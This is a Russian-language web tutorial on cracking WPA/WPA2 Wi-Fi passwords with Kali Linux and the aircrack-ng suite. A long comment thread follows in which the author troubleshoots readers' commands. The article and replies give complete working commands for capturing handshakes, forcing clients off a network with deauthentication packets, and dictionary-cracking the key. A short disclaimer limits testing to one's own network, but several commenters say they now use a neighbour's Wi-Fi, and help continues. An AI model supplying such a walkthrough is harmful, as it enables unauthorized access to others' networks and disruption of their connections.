• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Статья Как взломать пароль от wifi Wpa и Wpa2

Много людей ищут как взломать пароль от wifi и думают смогут сделать это сразу. Мы написали шаг за шагом как это сделать.

Требования :
  • Установленный Kali linux
  • Беспроводной адаптер способен к инъекции / режиме монитора
  • Wordlist, чтобы попытаться «взломать» пойманный пароль
  • Немного времени
  • Терпение
Кали Linux может быть использован для многих вещей, но лучше всего он известен своей способностью к пентестингу, или «взлому», WPA и WPA2 сетей. Есть сотни приложений Windows, которые утверждают, что они могут взломать WPA. Не используйте их! Они просто уловки, используемые профессиональными хакерами, чтобы заманить новичка и в итоге быть взломанным тем кто создаёт эти штуки. Существует только один способ, как хакер может попасть в сеть, и это все может быть сделано только с операционной системой Linux, беспроводной картой способной переходить в режим монитора, и Aircrack-ng или аналогичный. Также обратите внимание, что даже с этими инструментами, взлом Wi-Fi не для новичков.

Играя с этим нужно владеть базовыми знаниями о том, как WPA работает при аутентификации и умеренное знакомство с Kali Linux и его инструментов, так что любой хакер, который получает доступ к вашей сети, вероятно, не новичок!

Важное замечание: взлом чужого Wi-Fi без разрешения считается незаконным актом или преступлением в большинстве стран. Мы написали это руководство для целей безопасности! Нужно использовать собственную сеть для тестирования и рутер.

1. Запустите Kali Linux и зайдите как root

27621


2. Убедитесь что ваш беспроводной адаптер способен к инъекции
3. Отключитесь от всех беспроводных сетей, откройте терминал и введите
airmon-ng

27622


Здесь список всех беспроводных карт, которые поддерживают монитор (не инъекции) режим. Если нет карт в списке, попробуйте отключить и снова подключить карту и убедитесь, что она поддерживает режим монитора. Вы можете проверить, если карта поддерживает режим мониторинга, набрав IFCONFIG в другом терминале, если карта присутствует в IFCONFIG, но не появляется в airmon-ng, то карта не поддерживает его.
Здесь можно увидеть, что моя карта поддерживает режим мониторинга, и что он указан как wlan0.

4. Напишите airmon-ng start с последующим интерфейсом вашей беспроводной карты. Моя wlan0, так что моя команда будет выглядеть так:
Код:
airmon-ng start wlan0
27623


«monitor mode enabled» сообщение означает, что карта была успешно введена в режиме мониторинга. Обратите внимание на имя нового интерфейса монитора, у меня mon0.

Напишите Airodump-ng с указанием имени вашего интерфейса монитора, который, вероятно, mon0.

Теперь Airodump перечисляет все беспроводные сети в вашем районе, и много полезной информации о них. Найдите нужную вам сеть. После нажмите Ctrl + C на клавиатуре, чтобы остановить процесс. Обратите внимание на канал вашей цели.

27624


5. Скопируйте BSSID вашей цели

27625


6. Теперь напишите эту команду:
Код:
airodump-ng –c [channel] –bssid [bssid] –w /root/Desktop/ [monitor interface]

замените в ней все что находится в [ ] вашими данными.
После ваша команда должна выглядить примерно так
Код:
airodump-ng -c 9 --bssid 00:13:BF:E0:E7:D8 -w /root/Desktop/ mon0
Нажмите Enter

Airodump будет контролировать только цель, что позволяет нам захватить более конкретную информацию о ней. То, что мы действительно делаем сейчас это ждем устройства подключится к сети или повторно это сделает, заставляя рутер цели, отправлять в четырех направлениях Handshake, который мы должны захватить, чтобы взломать пароль.
Кроме того, четыре файла должны отображаться на рабочем столе, там Handshake будут сохранены, так что не удаляйте их!

Но мы на самом деле не будем ждать устройство для подключения, нет, это не то что нетерпеливые хакеры. Мы на самом деле собираемся использовать другой инструмент, который принадлежит к Aircrack suite под названием aireplay-ng, и ускорить этот процесс. Вместо того чтобы ждать устройство для подключения, хакеры используют этот инструмент, чтобы заставить устройство переподключитса, отправив деаутентификационые (deauth) пакеты к устройству, что делает его думать, что он должен воссоединиться с роутером.

Конечно, для того, чтобы этот инструмент работал, там должен быть кто-то еще подключен к сети, во-первых, так что следите за Airodump-NG и ждите клиента пока он покажется в сети. Это может занять много времени, или это может занять несколько секунд. Если никого не показывают после долгого ожидания, то сеть может быть пустой прямо сейчас, или вы к далеко от сети.

Вы можете увидеть в этой картинке, что клиент оказался в нашей сети, что позволяет нам начать следующий шаг.

27626


Оставьте Airodump-NG работать и откройте второй терминал. В этом терминале введите следующую команду:
Код:
aireplay-NG -0 2 -a [BSSID рутера] -с [клиент BSSID] mon0
Моя полная команда выглядит следующим образом:
Код:
aireplay-ng –0 2 –a 00:13:BF:E0:E7:D8 –c 4C:EB:42:59:DE:32 mon0
27627


При нажатии клавиши Enter, вы увидите как aireplay-ng отправляет пакеты, и через несколько мгновений, вы должны увидеть это сообщение на экране Airodump-NG!

27628


27629


Это означает, что Handshake был захвачен, пароль находится в руках хакера, в той или иной форме. Вы можете закрыть aireplay-NG терминал и нажмите Ctrl + C на Airodump-NG для остановки мониторинга сети, но не закрывайте его пока, вам нужно некоторая информация позже.

На этом мы завершаем внешнюю часть этого учебника. Отныне, процесс полностью между вашим компьютером, и этими четыре файла на рабочем столе. На самом деле, .cap один, который очень важный.

Wordlist в Kali linux находиться в /usr/share/wordlists или Создаем свой собственный

Откройте новый терминал и введите команду:
Код:
Aircrack-NG-a2 -b [BSSID рутера] -w [путь к словарю или к Wordlist] /root/Desktop/*.cap
-А метод Aircrack будет использовать для взлома Handshake, 2 метод = WPA.
-b означает BSSID, замените [рутер BSSID] с BSSID цели рутера, мой 00: 13: BF: E0: E8: D8.
-w означает wordlist, замените [путь к wordlist] с пути к worslist, что вы скачали. У меня есть список слов под названием «wpa.txt» в корневой папке.
/root/Desktop/*.cap является путь к файлу .cap с паролем, * означает wild card в Linux, и так как я предполагаю, что нет никаких других .cap файлов на рабочем столе, это должно работать нормально.

Моя полная команда выглядит следующим образом:
Код:
aircrack-ng –a2 –b 00:13:BF:E0:E8:D8 –w /root/wpa.txt /root/Desktop/*.cap
Нажмите Enter

Теперь Aircrack-ng начнет процесс взлома пароля. Он сможет взломать его, только если пароль есть в Worlist, что вы выбрали.
Крекинг пароля может занять длительное время в зависимости от размера списка слов. Мой прошло очень быстро.

Если фраза в Wordliste, то Aircrack-ng покажет вам это:

27630


Фраза для нашего тест-сети был «notsecure«, и вы можете увидеть здесь, что Aircrack его нашел.

Мы что-то упустили? У вас есть вопросы?

Пишите в комментариях! Мы всегда ответим.
 
АЛЕКС
27.12.2015 в 15:33
НЕ получается у меня этим методом, даже свой роутер не смог ломануть, подбор пароля идет и в конце высвечивает что такого пароля нет в Wordlist, буду увеличивать размер ворда и пробовать дальше, хотя ривером у меня ломается все на ура!

АЛЕКС
27.12.2015 в 15:34
На всю ночь поставил подбор и все ровно ничего не получилось

RUN_XD
31.01.2016 в 22:59
psyhocode,добрый вечер(день). Как с вами можно связаться? (Не в комментариях)

EVILMENTAT
27.02.2016 в 22:37
А я чот не могу понять, почему у меня при включении режима монитора не работает второй Wi-Fi свисток. Это не удобно, мягко говоря.

MOSTER
06.03.2016 в 20:47
адаптер обовязковий?

PUSHKINMAZILA
18.01.2017 в 21:59
Сложно…
Пиши нормально

LOSTWEB
07.04.2016 в 14:19
Всё делаю так как написано но мне выдается такая вот ошибка
Код:
demia-Aspire-E5-521 ~ # aircrack-ng -a2 -b F8:1A:67:A8:49:DC — w /home/demia/qwe /root/Desktop/*.cap
Please specify a dictionary (option -w).

Quitting aircrack-ng…
demia-Aspire-E5-521 ~ #
как только я уже не пробвал указывать этот путь к словарю все равно всегда выходит одно и тоже
помогите

NIKO77
07.05.2016 в 15:00
Добрый день.Помогите пожалуйста.адаптер перевожу в режим монитора и у меня такая картина показывает.(mac 80211 monitor mode al ready enabled for [phy0]wlan0on [phy0].Это совсем не так как на инструкции.Называние интерфейса wlan0 делаю команду и открывается на Airodump-ng start wlan0 новая страница и показывает все беспроводные сети а вот дальше не реагирует не одну команду.Может на инструкции какие то ошибки есть.?

PUSHKINMAZILA
18.01.2017 в 21:43
Ты открыл новое окно в нем запустился процесс
И он выполняется пока ты его не остановишь
Чтоб остановить нужно зажать Ctrl — C
А ваще нужно сначала изучить линукс начинай с центоса или убунту

SKRIFT
15.05.2016 в 10:14
простите а какая версия kali linux нужна

SKRIFT
15.05.2016 в 10:15
простите а какая версия kali linux нужна скажите34

PUSHKINMAZILA
18.01.2017 в 21:41
Любая
(Хотя это зависит от уровня вашего эго ну или задач)

CONSTANTINE
27.05.2016 в 20:22
Показываются ли в Airodump-NG мобильные устройства которые подключены к wi-fi сети?

PSYHOCODE
30.05.2016 в 13:43
да

PSYHOCODE
01.06.2016 в 23:08
Да показываются

DERA
07.06.2016 в 20:05
Код:
root@kali:~# aircrack-ng –a2 –b xx:xx:xx:xx:xx:xx –w /root/Desktop/mywordlist.txt /root/Desktop/*.cap
Opening –a2
open failed: No such file or directory
Opening –b
open failed: No such file or directory
Opening xx:xx:xx:xx:xx:xx
open failed: No such file or directory
Opening –w
open failed: No such file or directory
Opening /root/Desktop/mywordlist.txt
Unsupported file format (not a pcap or IVs file).
Opening /root/Desktop/-01.cap
Read 198690 packets.

# BSSID ESSID Encryption

1 xx:xx:xx:xx:xx:xx nazvanie WPA (1 handshake)

Choosing first network as target.

Opening –a2
open failed: No such file or directory

PSYHOCODE
08.06.2016 в 00:28
b (пробел поставте ) xx:xx:xx:xx:xx:xx

DERA
09.06.2016 в 09:53
Типа 2 пробела должно быть?
Вечером приду попробую сделать.
И подскажите если не трудно, в целях повышения образованности что обозначают эти команды а2 , b , w ?

PSYHOCODE
09.06.2016 в 15:42
Код:
-a    amode    Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK).
-b    bssid    Long version — -bssid. Select the target network based on the access point’s MAC address.
-w    words    (WPA cracking) Path to a wordlist or “-” without the quotes for standard in (stdin).

NURBA
26.11.2016 в 10:57
Здравствуйте! как можно установит wi fi адаптер на Kali

PSYHOCODE
26.11.2016 в 20:55
На kali ничего не нужно установить, просто подключите адаптер

NURBA
28.11.2016 в 18:41
я через виртуалку захожу? и у меня не показывает wlan0

PUSHKINMAZILA
18.01.2017 в 21:40
Убедись что ты подключил wifi адаптер к виртуалке машине

PUSHKINMAZILA
18.01.2017 в 21:39
Противно что люди сюда заходят только ради соседского WIFI ((((

NINJA
02.02.2017 в 16:10
ден Добрый
Код:
aircrack-ng –a2 –b xx:xx:xx:xx:xx:xx –w /root/Desktop/9mil.txt /root/Desktop/123.cap
Opening –a2
open failed: No such file or directory
Opening –b
open failed: No such file or directory
Opening 44:94:FC:8E:46:AE
open failed: No such file or directory
Opening –w
open failed: No such file or directory
Opening /root/Desktop/9mil.txt
Unsupported file format (not a pcap or IVs file).
Opening /root/Desktop/123.cap
Read 65409 packets.

# BSSID ESSID Encryption

1 xx:xx:xx:xx:xx:xx NETGEAR WPA (1 handshake)

Choosing first network as target.

Opening –a2
open failed: No such file or directory
как исправить проблему7

JOKER_013
05.02.2017 в 14:30
Автору спасибо!
Короче говоря,ломаем пароль брутфорсом ?

MAX
05.04.2017 в 21:53
если в комп Windows а не Linux есть какойта способ или более подходящие программа?

PSYHOCODE
05.04.2017 в 22:30
К сожелению aircrack только на линуксе.

LANTOS
29.05.2017 в 14:27
Вообщем такая проблема, USB адаптер, вроде всё находит на интерфейсе wlan0 , но при этом не включается режим монитора соответственно нету надписи о включении и самого интерфейса

LANTOS
29.05.2017 в 14:27
Вообщем такая проблема, USB адаптер, вроде всё находит на интерфейсе wlan0 , но при этом не включается режим монитора соответственно нету надписи о включении и самого интерфейса. Что делать?

KENAV
31.08.2017 в 15:24
сайт интересный, я залип…
Интересно кто писал движку? познакомьте…
По теме: автору почтение, текст прямой читается легко, один вопрос мелкий — «Wordlist в Kali linux находитса в /usr/share/wordlists «, а какой из них? там несколько списков, расскажите какой для чего там лежит? (dnsmap, fasttrack, sqlmap) и несколько папок со списками, или может команда будет выглядеть aircrack-ng –a2 –b 00:13:BF:E0:E8:D8 –w /usr/share/wordlists /root/wpa.txt /root/Desktop/*.cap (мол- смотри в папку- перебирай все листы, что найдешь?)

а на тему «фу, вы ради соседского …» — интернет на 80% состоит из п0p4ухи….)))))

СЕРГЕЙ
22.03.2015 в 17:14
ломаю с под винды дампером все норм прада не все получается

PSYHOCODE
24.03.2015 в 13:03
из под винды не все работает как надо… глючит… иногда дает ошибки…все таки все для линукса рассчитано

Г
04.04.2015 в 15:46
рнр

ПАВЕЛ
22.06.2015 в 14:51
Надеюсь что с под винды получится

PENTEST
28.03.2015 в 01:12
А у меня проблема с отображением клиентов, не отображаются мобильные подключения, и все клиенты висят без ассоциации с сетью. По этому появляются проблемы по отлову «рукопожатий». С чем это может быть связано?

PSYHOCODE
28.03.2015 в 15:54
проверьте ваше плату на способность инъекции… используйте Kali linux в качестве нужного ос!

ДЕШОН
03.04.2015 в 21:08
спосибо за информацию. попробовал и получилось! теперь есть wifi от соседа.

DEBIAN
07.04.2015 в 01:05
Тест то тест а если пароль посложнее…(
Часы работы…

PSYHOCODE
07.04.2015 в 01:37
залю wordlist нормальный упрощю всем работу.

PENTEST
07.04.2015 в 13:58
как раз из под kali linux сижу!

DEBIAN
07.04.2015 в 20:58
знаю может глупый вопрос но можно ли взломать пароль от вайфай юзая кали на виртуалбоксе или вмваре с подключенным внешним usb wifi адаптером?

PSYHOCODE
08.04.2015 в 02:54
да конечно возможно

DEBIAN
08.04.2015 в 06:40
спасибо — надеюсь будет об этом отдельная статья
что там с вордлистом кстати?

АНДРЕЙ
08.04.2015 в 16:17
Посоветуйте пожалуйста адаптер который можно использовать для этих целей, чтобы была возможность подключить внешнюю направленную антенну, а до компьютера сигнал от него довести по витой паре.
Т.е. адаптер ставится на чердаке возле антенны.
Желательо и ссылку на интернет магазин, чтобы я мог его купить.
Например я регулярно делаю покупки на , там этих адаптеров масса, а какой выбрать, я не знаю.
Спасибо.

DEBIAN
09.04.2015 в 13:58
да было б очень хорошо…

PSYHOCODE
17.04.2015 в 02:50
Любой внешний способен к инъекции даже самый дешевый! Но лучше купить средний так как сигнал будет лучше ! Практически можете выбрать любой средней стоимости!

MAXUBAYTER
09.05.2015 в 18:56
Я для этих целей решил заказать
Еще не пришел, как испробую напишу о результате.

PSYHOCODE
09.05.2015 в 19:29
Будем рады увидеть ваши положительные результаты!

NIKO77
12.05.2016 в 02:28
Ни фига положительного результата не будет.твой словарь вообще не действует .только цифру надо больше 8 поднять надо .а цифры и буквы всех добавить невозможно.возможно конечно но для этого самый мало 1000 тб хард диска памяти надо.а за пару буквы аиркрак ничего не находит.

OLAY
13.04.2015 в 22:37
Gde mojem naiti wordlist?

PSYHOCODE

17.04.2015 в 02:48
Wordlist в Kali linux находитса в /usr/share/wordlists
или сгенереруйте создадите свой собственый!

MAXUBAYTER
09.05.2015 в 19:09
А в этом подборе пароля используется ресурсы процессора? А как задействовать для этого видеокарту? Мне приходится переключатся на винду и там подбирать. Разница в скорости — в 10 раз быстрее на видеокарте (использую Passcape Wireless Password Recovery Pro). А на Linuxe видимо что то делаю не так с драйверами. Если кто с опытом поможет?

PSYHOCODE
09.05.2015 в 19:28
Извините но у видеокарты совсем другая роль.
По моему опыту скажу что в линуксе подбор пароля проходит быстрee так как он использует процесор максимально. Задайте вопрос на форуме и прикрепите сриншут чтобы мы поняли и смогли вам помочь!

MAXUBAYTER
10.05.2015 в 00:26
Я сравнивал скорость на CPU в винде и линуксе она почти одинакова. А на GPU в линуксе не получилось проверить. Создам тему на форуме, там обсудим.

PSYHOCODE
10.05.2015 в 04:49
на форуме обсудим все нюансы и подробно объясню

ВАСЯ
15.11.2015 в 20:03
У видеокарты как раз та роль о которой вы не знаете. Есть технология CUDA, которая задействует микропроцессоры видеокарты дя параллельных вычислений. Именно на линуксе есть возможность при установке специальных драйверов повысить скорость перебора паролей, например: если на винде моя скорость 3тыс паролей в секунду, то на линуксе 21тыс.

ITXS
21.05.2015 в 00:49
Процессоры видеокарты подходят для этого раз в сто лучше чем ЦП. Достаточно запустить приложение через профайлер, тем самым полностью перенеся вычисления на видеокарту

PSYHOCODE
21.05.2015 в 01:31
тут согласен. но простому юзеру это не объяснишь!
+ к этому скоро будет опубликовано утилита которая позволяет подбирать пароль в 1000 раз быстрее. не надо будет использовать видеокарту!

MAXXX
23.05.2015 в 21:52
Когда пишу команду: aireplay-NG -0 2 -a [BSSID рутера] -с [клиент BSSID] mon0, у меня получается:
root@kali:~# aireplay-ng -0 2 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0
19:37:47 Waiting for beacon frame (BSSID: **:**:**:**:**:**) on channel -1
19:37:47 Couldn’t determine current channel for mon0, you should either force the operation with —ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
как это исправить?

PSYHOCODE
24.05.2015 в 03:07
airmon-ng check — покажет какие сервисы влияют на mon0 и airmon-ng check kill остоновит сервисы каторые влияют на ваш mon0. Если не поможет то вот ишо вариант — убейте процесс Network Manager далее пишем airmon-ng stop wlan0 | airmon-ng start wlan0 | ifconfig wlan0 down | ifconfig wlan0 up

SHAMAN
26.05.2015 в 04:47
Доброго времени суток!
Подмогите пожалуйста после ввода aireplay-NG -0 2 -a [BSSID рутера] -с [клиент BSSID] mon0
отвечает
Код:
Waiting for beacon frame (BSSID: 90:F6:52:7E:31:F6) on channel -1
23:15:47 Couldn’t determine current channel for mon0, you should either force the operation with —ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
Что делать?

PSYHOCODE
26.05.2015 в 20:21
я написал уже ответ на этот вопрос, смотрите выше

SHAMAN
27.05.2015 в 04:28
Прошу прощения не обратил внимания) Спасибо!

SHAMAN
29.05.2015 в 07:37
Не получается( Убивал Network Manager и т.д. не выходит тоже самое пишет…
Я так понимаю что то с каналом не лады вроде…он пишет про первый а роутер работает на другом можно ли в эту команду добавить канал aireplay-NG -0 2 -a [BSSID рутера] -с [клиент BSSID] mon0 ? Если я правильно понял.
Спасибо!

PSYHOCODE
29.05.2015 в 17:37
експериментируйте смело! Может поймете в чем ошибаетесь.. Проверьте себя 2важды на коректность исполнения.

LUKA666
24.06.2015 в 11:47
А как добавить канал в эту команду? (сори за тупой вопрос). У жертвы канал 6 и как его приписать к строчке: aireplay-NG -0 2 -a [BSSID рутера] -с [клиент BSSID] mon0 ?

LUKA666
27.06.2015 в 14:38
Всё разобрался. В строчке aireplay-NG -0 2 -a [BSSID рутера] -с [клиент BSSID] mon0 Нужно вместо -0 2 , поставить -0 0 и терпеливо дожидаться поимки хэндшейка.
Да, и во избежания таких проблем как:
Код:
Couldn’t determine current channel for mon0, you should either force the operation with —ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
Необходимо сделать: airomon-ng check kill в самом начале. Ещё до что введения карты в режим мониторинга, т.е. до введения команды: airmon-ng start wlan0 . Как-то так у меня получилось.

KOSTYA
30.05.2015 в 02:08
Блин такая вот фигя
я ломаю сеть wpa2

и после команды
Код:
aireplay-ng –0 2 –a 04:8D:38:5E:67:D9 –c 80:9B:20:44:F1:E8 mon0
мне сначало выбивало
Код:
Waiting for beacon frame (BSSID: 04:8D:38:5E:67:D9) on channel -1
14:39:07 Couldn’t determine current channel for mon0, you should either force the operation with —ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
но я ввел команду чтобы ето устаканить

сначала ету
Код:
airmon-ng check
потом ету
airmon-ng check kill
написало что успокоило ети процесы но не делает хендшейк и выбиват тупую фигню
Код:
root@kali:~# aireplay-ng -0 2 -a 04:8D:38:5E:67:D9 -c 80:9B:20:44:F1:E8 mon0
21:07:19 Waiting for beacon frame (BSSID: 04:8D:38:5E:67:D9) on channel 2
21:07:19 Sending 64 directed DeAuth. STMAC: [80:9B:20:44:F1:E8] [ 0| 0 ACKs]
21:07:20 Sending 64 directed DeAuth. STMAC: [80:9B:20:44:F1:E8] [ 0| 0 ACKs]

напишыте что делать

PSYHOCODE
30.05.2015 в 05:00
Couldn’t determine current channel for mon0. После -с напишите канал WIFI которого ломаете. А лучше напишите на форум и дайте пару скриншотов. Там сможем лучше понять и помочь вам.

COUPER
07.06.2015 в 17:34
Эмм, извиняюсь. А вот с этим что делать aireplay-ng??

PSYHOCODE
07.06.2015 в 20:52
aireplay-ng (Инжектор для пакетов)

COUPER
07.06.2015 в 21:30
А вот по поводу метода, переподключение клиента, чтобы узнать (STATION) Я эти методы не понял. Перехватывает пакеты уже около 2х часов

COUPER
07.06.2015 в 22:02
Код:
waiting for beacon frame (bssid: [bssid] ) on channel -1
couldn’t determine current channel for mon0, you should either force the operation with —ignore-negative-one or apply a kernel patch
please specify an ESSID (-e)
Это во время aireplay-ng

PSYHOCODE
07.06.2015 в 22:17
На форуме пожалуйста покажите скриншоты операции и мы покажем где вы ошиблись.

PSYHOCODE
07.06.2015 в 21:49
жди handshake. или спровоцируй его сам….

SHAMAN
09.06.2015 в 09:34
Все получилось) Спасибо теперь мое устройство в паутине. Вот такой вопрос рукопожатие с андройда не ловит ( Aireplay работает устройство отваливается это видно но монитор не ловит пожатие руки…с ноутом все на раз проходит. Подскажите пожалуйста что делать? Есть ли какие то методы?

PSYHOCODE
09.06.2015 в 21:23
скорее всего у андройда не инжектабельная плата….

SHAMAN
10.06.2015 в 04:45
Не совсем понятно ) Ну да ладно бесплатный инет дома — это уже победа) Респект V

ALEKS
15.06.2015 в 14:06
Код:
root@root:~# airmon-ng
PHY    Interface    Driver    Chipset

phy3    wlan1    rtl8187    Realtek Semiconductor Corp. RTL8187

root@root:~# airmon-ng start wlan1
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
2849 dhclient
3246 NetworkManager
3608 wpa_supplicant
что может быть

Код:
PHY    Interface    Driver    Chipset

phy3    wlan1    rtl8187    Realtek Semiconductor Corp. RTL8187
(mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
(mac80211 station mode vif disabled for [phy3]wlan1)

root@root:~#

PSYHOCODE
15.06.2015 в 15:13
на форум со скриншотом

I'M YOUR HACKER
02.07.2015 в 00:52
что делать если файлы создаются еще до того ка хендшейк пойман? и когда ловишь хендшейк и используешь его aircrack пишет no file to crack specified?

JUY13
21.07.2015 в 22:05
Как обратно поднять Network manager?

АКЖАН
23.07.2015 в 18:27
а где можно скачать эту программу kali linux?

ARES
24.07.2015 в 02:46
Это не программа, это Linux дистрибутив, основан на Debian. На официальном сайте глянь,

KL
28.07.2015 в 13:41
Добрый день! Подскажите пожалуйста в чем может быть причина:
Код:
root@kl:~# aireplay-ng -0 5 -a CC:**:**:**:**:F0 -c 00:**:**:**:**:C9 wlan0mon
10:04:39 Waiting for beacon frame (BSSID: CC:5D:4E:FE:63:F0) on channel 1
10:04:39 Sending 64 directed DeAuth. STMAC: [00:22:68:A0:1C:C9] [ 1| 0 ACKs]
10:04:40 Sending 64 directed DeAuth. STMAC: [00:22:68:A0:1C:C9] [ 0| 0 ACKs]
отправляет 2 строки и зависает.
Спасибо!

PSYHOCODE
29.07.2015 в 02:51
Код:
aireplay-ng -0 99 -a MAC-address -c MAC-address wlan0

KL
30.07.2015 в 21:52
Пишу:
Код:
aireplay-ng -0 99 -a CC:5D:4E:FE:63:F0 -c 00:22:68:A0:1C:C9 wlan0
получаю:
Код:
Interface wlan0:
ioctl(SIOCGIFINDEX) failed: No such device
пушу:
Код:
aireplay-ng -0 5 -a CC:5D:4E:FE:63:F0 -c 00:22:68:A0:1C:C9 wlan0mon
работает только так (wlan0mon), но получаю:
Код:
Waiting for beacon frame (BSSID: CC:5D:4E:FE:63:F0) on channel 1
Sending 64 directed DeAuth. STMAC: [00:22:68:A0:1C:C9] [ 1| 0 ACKs]
Sending 64 directed DeAuth. STMAC: [00:22:68:A0:1C:C9] [ 0| 0 ACKs]
т.е. таже история.
Может кто сталкивался, подскажите в какую сторону копать) ?

PSYHOCODE
31.07.2015 в 13:04
добавь —ig и попробуй снова
Код:
aireplay-ng -0 99 —ig -a CC:5D:4E:FE:63:F0 -c 00:22:68:A0:1C:C9 wlan0mon

KL
31.07.2015 в 17:44
Пишу:
Код:
aireplay-ng -0 99 —ig -a CC:5D:4E:FE:63:F0 -c 00:22:68:A0:1C:C9 wlan0mon
получаю все тоже самое:
Код:
Waiting for beacon frame (BSSID: CC:5D:4E:FE:63:F0) on channel 6
Sending 64 directed DeAuth. STMAC: [00:22:68:A0:1C:C9] [ 2| 2 ACKs]
Sending 64 directed DeAuth. STMAC: [00:22:68:A0:1C:C9] [ 3| 4 ACKs]
🙁
может дрова т.е. (firmware) wi-fi обновить iwlwifi-7260. Только как?

PSYHOCODE
06.08.2015 в 23:32
что показывает iwconfig?

KL
10.08.2015 в 14:47
Код:
iwconfig:
eth0 no wireless extensions.

wlan0mon IEEE 802.11abgn Mode:Monitor Frequency:2.412 GHz Tx-Power=0 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on

lo no wireless extensions.
PSYHOCODE
24.08.2015 в 15:05
sudo iwconfig wlan0 power off

AGENT
23.08.2015 в 11:14
Полная чушь что только из под линукса и только один этот способ,
для винды нужен «CommView for WiFi» и тотже «Aircrack-ng» или «elcomsoft wireless security auditor», последний даже лучше, скорость при использовании видеокарты такая что можно даже бутфорсить, скорость до 200000 переборов в секунду на домашнем ПК с хорошей видеокартой.

ТРУЛАЛА
24.08.2015 в 12:21
Во-первых:
— автор, когда переводишь текст гуглотренслейтом или промтом там каким — потрудись его перечитать и исправить косяки.
Во-вторых:
— приличия ради стоило бы указать автора сего мануала, а то получается так, что «я сам написал и придумал», но это вранье.
В-третьих:
— автор, а если пароль будет «УебР23049яшКа» — то ты, получается в пролете. А если авторизация стоит в радиус и в АД, до кучи — то ты, автор, можешь смело шутить сухари. Так?

YAROSLAV
27.08.2015 в 17:57
Код:
root@kali:~# airmon-ng
PHY    Interface    Driver    Chipset

phy0    wlan1    ath9k    Qualcomm Atheros AR9462 Wireless Network Adapter (rev 01)

root@kali:~# airmon-ng start wlan1
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
723 NetworkManager
930 wpa_supplicant

PHY    Interface    Driver    Chipset

phy0    wlan1    ath9k    Qualcomm Atheros AR9462 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlan1 on [phy0]wlan1mon)
(mac80211 station mode vif disabled for [phy0]wlan1)

root@kali:~# airodump-ng wlan1mon
ioctl(SIOCSIWMODE) failed: Device or resource busy

ARP linktype is set to 1 (Ethernet) — expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run ‘airmon-ng start wlan1mon ‘
Sysfs injection support was not found either.

Что делать? не работате

PSYHOCODE
27.08.2015 в 22:15
Код:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

DEMONSS
28.08.2015 в 22:38
здраствуйте у меня такая же проблемка как у YAROSLAVA ПОМОГИТЕ ПОЖАЛУСТА

PSYHOCODE
31.08.2015 в 04:24
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

ДИМОН
30.08.2015 в 15:45
Здравствуйте!Подскажите пожалуйста как создать LiveUSB с Kali Linux?

PSYHOCODE
31.08.2015 в 04:26

ДИМОН
01.09.2015 в 17:59
Уже пробовал разными способами и этим в том числе,ничего не выходит.Посоветуйте пожалуйста что-нибудь рабочее.Спасибо.

PSYHOCODE
02.09.2015 в 16:07
На этой неделе я напишу пост о том как создать LiveUSB с Kali Linux

ДИМОН
02.09.2015 в 20:57
Спасибо большое,буду очень ждать.

DEMONSS
31.08.2015 в 18:41
здраствуйте вот смотрите ввожу команди:
Код:
root@kali:-#ifconfig wlan0 down wlan0:ERROR while getting interface flags:No such device root@kali:-#iwconfig wlan0 mode monitor Error for wireless request «Set Mode» (8B06) :SET failed on device wlan0;No such device. root@kali:-#ifconfig wlan0 up wlan0:ERROR while getting interface flags:No such device
и что делать помогите пожалуста а то никак не разберусь

PSYHOCODE
01.09.2015 в 02:49
wlan0 замените на ваш wifi адаптер (возможно он wlan1 но обычно у всех wlan0) и проверите работает ли вообще ваш wifi адаптер

DEMONSS
05.09.2015 в 02:33
wifi точна работает сети ловет

PSYHOCODE
05.09.2015 в 03:15
что показывает ifconfig?

HELPME
17.09.2015 в 16:16
Здравствуйте! Когда я приступаю к атаке с помощью aircrack-ng, то выдаёт такую ошибку: Failed. Next try with 5000 IVs. У меня, например IVs — 473. Что это? Как исправить? Помогите!

PSYHOCODE
17.09.2015 в 18:58
нету пароля в этих пакетах, собирай еще

KOSTYA
17.09.2015 в 23:42
Мне пишер вот ето
Код:
ARP linktype is set to 1 (Ethepnet) — expected ARPHRD_IEEE80211, ARPHRD_IEEE8021_FULL or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled: run ‘airmon-ng start wlan0mon ‘ Sysfs injection support was not found either.
PSYHOCODE
19.09.2015 в 17:27
что показывает ifconfig?

RELOMAN
27.09.2015 в 20:54
У меня нету надписи (monitor mode enable …)Я использую Linux Deploy

RELOMAN
27.09.2015 в 21:18
Ещё пишет Ethtool failde…

PSYHOCODE
02.10.2015 в 18:30
Linux Deploy это программа для установки операционной системы (ОС) GNU/Linux на Android устройство.

PSYHOCODE
02.10.2015 в 18:34
для того чтоб взломать wifi с андрод устроиство вам нужно wifi антена

GURUHACKWIFI
06.10.2015 в 10:57
Один из лучших WiFi адаптеров для взлома . Лучше всяких Alfa и TP-Link…

GURUHACKWIFI
06.10.2015 в 11:00
Опробовано на практике

EVGEN
24.10.2015 в 02:23
Васи, вы совсем наивные чтоли??? Нужно же быть такими лошками, что тут собрались! Чтобы подобрать пароль простым перебором из библиотеки паролей вы до гроба будете ждать!!! Клуб юных натуралистов блин

MULLER
